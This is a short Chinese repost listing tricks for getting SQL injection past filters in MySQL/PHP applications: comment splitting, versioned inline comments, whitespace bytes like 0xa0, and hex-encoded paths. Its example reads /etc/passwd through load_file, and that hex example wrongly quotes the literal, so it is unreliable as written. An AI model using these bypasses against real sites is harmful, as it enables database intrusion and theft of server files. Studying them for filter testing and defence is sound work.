虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因 1.注释绕过select/*comment*/user/*zzsdsdsf*/from mysql.user; 2.内联注释绕过/*!12345select*//*!12345us ...
虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因
1.注释绕过
select/*comment*/user/*zzsdsdsf*/from mysql.user;
2.内联注释绕过
/*!12345select*//*!12345user*/ from mysql.user;
3.特殊空白字符绕过
在php中\s会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
但是在mysql中空白字符为 0x09,0x0a,0x0b,0x0c,0x0d,0x20,0xa0
0xa0有时候有奇效
0x0a和0x0d会影响"."的匹配,有时候也是可以利用的
4.十六进制绕过
select load_file('0x2f6574632f706173737764');
python
>>> '/etc/passwd'.encode('hex')
原标题:mysql注入绕过的一些技巧
关键词:MYSQL
*特别声明:以上内容来自于网络收集,著作权属原作者所有,如有侵权,请联系我们:
admin#shaoqun.com
(#换成@)。